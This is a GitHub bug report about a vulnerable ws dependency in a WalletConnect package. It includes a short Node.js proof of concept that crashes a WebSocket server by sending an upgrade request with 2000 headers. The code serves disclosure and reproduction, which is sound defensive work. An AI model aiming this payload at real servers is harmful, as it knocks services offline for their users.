
Vulnerable `ws` dependency causing DoS vulnerability

Open | josadcha opened this issue 1 year ago • 1 comment

Describe the bug

The @walletconnect/jsonrpc-ws-connection package depends on a vulnerable version of the ws package (^7.5.1). This vulnerability allows a Denial of Service (DoS) attack by sending a request with many HTTP headers, exceeding the server.maxHeadersCount threshold and causing the server to crash.

SDK Version (if relevant)

  • Client: JS
  • Version 2.13.3

To Reproduce

Steps to reproduce the behavior:

  1. Set up a project with the @walletconnect/jsonrpc-ws-connection package.
  2. Use the following proof of concept code (from Dependabot) to send a request with excessive headers:
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Expected behavior

The @walletconnect/jsonrpc-ws-connection package should depend on a non-vulnerable version of the ws package (>=8.17.1). The server should handle requests with many HTTP headers gracefully without crashing.

Screenshots

N/A

Desktop (please complete the following information):

  • OS: [e.g. iOS]
  • Browser [e.g. chrome, safari]
  • Version [e.g. 22]

Smartphone (please complete the following information):

  • Device: [e.g. iPhone6]
  • OS: [e.g. iOS8.1]
  • Browser [e.g. stock browser, safari]
  • Version [e.g. 22]

Additional context

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

josadcha, Jun 27 '24 14:06